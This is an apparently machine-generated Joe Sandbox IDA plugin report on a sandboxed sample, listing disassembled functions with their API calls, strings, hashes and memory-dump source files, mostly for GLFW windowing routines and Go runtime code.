Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: callocstrcpy
String ID: ,
API String ID: 2080364334-3772416878
Opcode ID: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
Instruction ID: 2166c0fec8160fdcf23276cbfbda69153d91a4fbb368ab464f647e45cf49f8a2
Opcode Fuzzy Hash: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
Instruction Fuzzy Hash: EBC1E3B49087589FDB55DF29C98469ABBF1BF89704F00C99EE98897300D734DA85CF82

Function 64610920 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 173COMMON

Download Yara Rule

Strings

,cd, xrefs: 646109C1
,cd, xrefs: 646109E3
,cd, xrefs: 64610B78
,cd, xrefs: 6461099A
,cd, xrefs: 64610A91
,cd, xrefs: 64610B67
,cd, xrefs: 64610B30
,cd, xrefs: 6461097C
,cd, xrefs: 64610B35

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID: ,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd
API String ID: 0-339892999
Opcode ID: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
Instruction ID: 1ddd88567b8f70bbd00b5d5b2014a53fbbc7393fae63a5ad54a31b5f61634dc3
Opcode Fuzzy Hash: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
Instruction Fuzzy Hash: 6A51CD75A082518BDF11CF2DD88068AB7F1FF9B708F11AA2AE944AB715D730E915CBC1

Function 6460A81D Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC

ChangeDisplaySettingsExW.USER32 ref: 6460A8D5

Strings

Graphics mode not supported, xrefs: 6460A902
Unknown error, xrefs: 6460A92B
Failed to write to registry, xrefs: 6460A920
Graphics mode failed, xrefs: 6460A916
The system uses DualView, xrefs: 6460A8EE
, xrefs: 6460A8AC
Invalid parameter, xrefs: 6460A90C
Computer restart required, xrefs: 6460A930
Invalid flags, xrefs: 6460A8F8

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: DisplaySettings$ChangeEnum
String ID: $Computer restart required$Failed to write to registry$Graphics mode failed$Graphics mode not supported$Invalid flags$Invalid parameter$The system uses DualView$Unknown error
API String ID: 1333101904-1192658212
Opcode ID: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
Instruction ID: b7b648b479718ed1ff53332b7b2a45aaa3563233a014b2ba000b28bcd7754222
Opcode Fuzzy Hash: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
Instruction Fuzzy Hash: FC3192B0A043448BCB14CF69C58079EBBF0EFA5768F50CA69E4A9DB390E330D4468F42

Function 6460B26A Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 6460B2F3
CreateDIBSection.GDI32 ref: 6460B331
ReleaseDC.USER32 ref: 6460B34D
CreateBitmap.GDI32 ref: 6460B393
CreateIconIndirect.USER32 ref: 6460B454
DeleteObject.GDI32 ref: 6460B466
DeleteObject.GDI32 ref: 6460B472
DeleteObject.GDI32 ref: 6460B3C4

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

|, xrefs: 6460B2A1

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CreateDeleteObject$BitmapByteCharErrorFormatIconIndirectLastMessageMultiReleaseSectionWide
String ID: |
API String ID: 2799049117-2343686810
Opcode ID: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
Instruction ID: e6dfc101f53f0bffcb151d90b53f43c180f82b0aa41017cfdc907e9a12dc0c54
Opcode Fuzzy Hash: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
Instruction Fuzzy Hash: B851FF70908318CFEB25DF69C984B9ABBF0AF4A704F00C4ADD98897340D7759A88CF52

Function 6460B6B7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 6460B6D6
GetClientRect.USER32 ref: 6460B6FB

Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087DA
Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087F6
Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 64608812
Part of subcall function 6460877D: RtlVerifyVersionInfo.NTDLL ref: 64608830

GetDpiForWindow.USER32(00000000), ref: 6460B725
AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460B770
ClientToScreen.USER32 ref: 6460B78C
ClientToScreen.USER32(00000000,00000000), ref: 6460B7A0
SetWindowLongW.USER32 ref: 6460B7B9
SetWindowPos.USER32 ref: 6460B7FB

Strings

4, xrefs: 6460B7CD

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Window$ClientConditionMask$LongRectScreen$AdjustInfoVerifyVersion
String ID: 4
API String ID: 4217418125-4088798008
Opcode ID: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
Instruction ID: 72991660b5e62e9fb88cc883b23a07306cfc7d732dec7a01ff09eadeeccb0505
Opcode Fuzzy Hash: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
Instruction Fuzzy Hash: CE41D8B1A083059FCB04EF69C58869EBBF8EF89714F00892DE898D7345DB749844CF92

Function 00A482C0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON

Download Yara Rule

Strings

runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=runtime\.call[0-9]*sampling period=%dsavepoint_exceptionsdp: invalid syntaxsemaRoot rotateLeftskip this directorystopm holding locksstring_is_file_pathstring_is_lon, xrefs: 00A4845B
CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryOut-Of-Bounds Level: '%d', defaulting to NoLevelRat.GobDecode: encoding version %d not supportedSindhi Islamic Repub, xrefs: 00A48580
%, xrefs: 00A485E4
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in key inputtls: internal error: failed to upda, xrefs: 00A4854C
bad g0 stackbad kind: %sbad recoverybigint("%v")block clausebtree.go:671btree.go:754btree.go:764btree.go:774c ap trafficc hs trafficcaller errorcan't happencapitalColorcas64 failedchan receiveclose notifycompare: %+vcontainsrunecontent-typecontext.TODOcountry_, xrefs: 00A484CA
,-./01235789:;<>?ACFGHKMNOSVYZ"^_`aehmnqtyz| ( * + , / @ P [ ` }!!!=#?${%-%=%d%g%q%s%v%x&&&=&^()(") )$)()*.*/*=+++-+=, ---.-=->.-...\/*///=/c/i00010X0b0o0s0x253031323334353637384041424344454647485363808690: :=::]; <!<-<<<=<><?=#==="> >=>>?>??A0A1A2A3A4AD, xrefs: 00A48485
VirtualQuery for stack base failedprovider already excluded: %s: %swrapTest(t, func(t *testing.T) {^((\d{4}-)?\d{3}-\d{3}(-\d{1})?)?$^[a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]+$__gnu_cxx::new_allocator::allocateadding nil Certificate to CertPooland or: param type mus, xrefs: 00A48525
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in, xrefs: 00A485A7
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setsql: Scan called without calling NextstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflows, xrefs: 00A485DB
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00A484F1

Memory Dump Source

Source File: 00000000.00000002.1865178433.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1864937079.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1865649432.0000000001210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1865649432.00000000014AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1865649432.00000000014B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866253310.00000000019B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866277435.00000000019B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866303995.00000000019C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866324743.00000000019D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866342097.00000000019D3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866361030.00000000019D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866381535.00000000019D6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866457177.0000000001A9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866479431.0000000001AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866499704.0000000001AA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866518430.0000000001AA5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866538222.0000000001AA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866557931.0000000001AAB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866605795.0000000001AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866624536.0000000001AAE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866643863.0000000001AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866643863.0000000001AC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866643863.0000000001AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866643863.0000000001AE4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866643863.0000000001AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866877045.0000000001AF2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866895370.0000000001AF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1866895370.0000000001B60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID: %$,-./01235789:;<>?ACFGHKMNOSVYZ"^_`aehmnqtyz| ( * + , / @ P [ ` }!!!=#?${%-%=%d%g%q%s%v%x&&&=&^()(") )$)()*.*/*=+++-+=, ---.-=->.-...\/*///=/c/i00010X0b0o0s0x253031323334353637384041424344454647485363808690: :=::]; <!<-<<<=<><?=#==="> >=>>?>??A0A1A2A3A4AD$CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryOut-Of-Bounds Level: '%d', defaulting to NoLevelRat.GobDecode: encoding version %d not supportedSindhi Islamic Repub$VirtualQuery for stack base failedprovider already excluded: %s: %swrapTest(t, func(t *testing.T) {^((\d{4}-)?\d{3}-\d{3}(-\d{1})?)?$^[a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]+$__gnu_cxx::new_allocator::allocateadding nil Certificate to CertPooland or: param type mus$bad g0 stackbad kind: %sbad recoverybigint("%v")block clausebtree.go:671btree.go:754btree.go:764btree.go:774c ap trafficc hs trafficcaller errorcan't happencapitalColorcas64 failedchan receiveclose notifycompare: %+vcontainsrunecontent-typecontext.TODOcountry_$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setsql: Scan called without calling NextstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflows$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in key inputtls: internal error: failed to upda$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=runtime\.call[0-9]*sampling period=%dsavepoint_exceptionsdp: invalid syntaxsemaRoot rotateLeftskip this directorystopm holding locksstring_is_file_pathstring_is_lon
API String ID: 0-3986399674
Opcode ID: db118c51debb8b848c0a001a6d646536974e2acd7475f49e6b0b1b0eadb45182
Instruction ID: 3a7ce5882c6479292f7aea581d24d732169b7cba1c08359261b9223365e31502
Opcode Fuzzy Hash: db118c51debb8b848c0a001a6d646536974e2acd7475f49e6b0b1b0eadb45182
Instruction Fuzzy Hash: 2881BEB85097019FD310EF64D29975EBBE4BF88708F00892CE4989B346DB79D9498F62

Function 64610780 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 646107AF
vfprintf.MSVCRT ref: 646107CF
abort.MSVCRT ref: 646107D4
VirtualQuery.KERNEL32 ref: 64610867
VirtualProtect.KERNEL32 ref: 646108BD
GetLastError.KERNEL32 ref: 646108CA

Strings

@, xrefs: 646108AE

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1616349570-2766056989
Opcode ID: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
Instruction ID: 9e0d6672c3fcfc9b39a93dd72e7bd94e9e8b2bda23d8cb2d541a2a85f03da3ec
Opcode Fuzzy Hash: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
Instruction Fuzzy Hash: 8C4137B190C3419FDB11EF29C48565EFBE0FF96358F51892EE8988B214E734E854CB92

Function 6460DEEC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111windowkeyboardCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 6460DF1B
TranslateMessage.USER32 ref: 6460DF47
DispatchMessageW.USER32 ref: 6460DF51
GetActiveWindow.USER32 ref: 6460DF5A
GetPropW.USER32 ref: 6460DF73
GetKeyState.USER32 ref: 6460DFA7

Strings

`:ad, xrefs: 6460DF84

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Message$ActiveDispatchPeekPropStateTranslateWindow
String ID: `:ad
API String ID: 1098235094-94877694
Opcode ID: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
Instruction ID: 893a9ba0832886e63f4c01581edf47c081ddb0a9f75bb26455985c2c0c5d4a68
Opcode Fuzzy Hash: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
Instruction Fuzzy Hash: D24187B1908385DBDB04AFA6C5846AEBBF5FF44B10F00D82DE8959B201DB70D888CB52

Function 64602D50 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

glfwDestroyWindow.GLFW.3927611081(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D75
glfwDestroyCursor.GLFW.3927611081(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D88
free.MSVCRT ref: 64602DC4
free.MSVCRT ref: 64602DE5
free.MSVCRT ref: 64602E2B

Strings

;cd, xrefs: 64602D51
0cd, xrefs: 64602E18

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: free$Destroyglfw$Cursor.Window.
String ID: 0cd$ ;cd
API String ID: 2442548815-1884057578
Opcode ID: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
Instruction ID: 9aad1b5e57044b7d2b94080ccc180e97156aa84a46e9e744f830eeb9d27d8246
Opcode Fuzzy Hash: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
Instruction Fuzzy Hash: 4121A7706087908BFB15AF6AC294799BBE4FF15B44F40A92ED5808BB80DB35DCC48B56

Function 646064FA Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
Instruction ID: e9857d6c81e66214a173a1493ea557c90cea33299e3cb8046c12e10172541d74
Opcode Fuzzy Hash: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
Instruction Fuzzy Hash: 9B412BB0518781DFEB16DF6ACA8076AB7F4EB56B04F01A41CE48493608E7B5C884DF5A

Function 6460B89F Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

CreateRectRgn.GDI32(00000000), ref: 6460B90B
GetWindowLongW.USER32 ref: 6460B95B
SetWindowLongW.USER32 ref: 6460B97D
SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
DeleteObject.GDI32 ref: 6460B9B3
GetWindowLongW.USER32(00000000), ref: 6460B9CD
SetWindowLongW.USER32 ref: 6460B9EF
RedrawWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6460C8D5,00000000,00000000), ref: 6460BA19

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Window$Long$ConditionMask$AttributesCreateDeleteInfoLayeredObjectRectRedrawVerifyVersion
String ID:
API String ID: 612219794-0
Opcode ID: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
Instruction ID: 44e4981ab1a89db8cfa399fa1c146b8c8643086fc116cd7b941efe6b6b07ab75
Opcode Fuzzy Hash: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
Instruction Fuzzy Hash: A541C8B1509706DFDB10AF69C64879EBBF4EF45725F00CA2CE8A88B281DB749444CF52

Function 6460DD8F Relevance: 12.1, APIs: 8, Instructions: 81fileCOMMON

Download Yara Rule

APIs

DragQueryFileW.SHELL32 ref: 6460DDAF
calloc.MSVCRT ref: 6460DDC6
DragQueryPoint.SHELL32 ref: 6460DDDA
calloc.MSVCRT ref: 6460DE36

Part of subcall function 6460844C: WideCharToMultiByte.KERNEL32 ref: 64608499

free.MSVCRT ref: 6460DE70
free.MSVCRT ref: 6460DE98
free.MSVCRT ref: 6460DEA2
DragFinish.SHELL32 ref: 6460DEAD

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
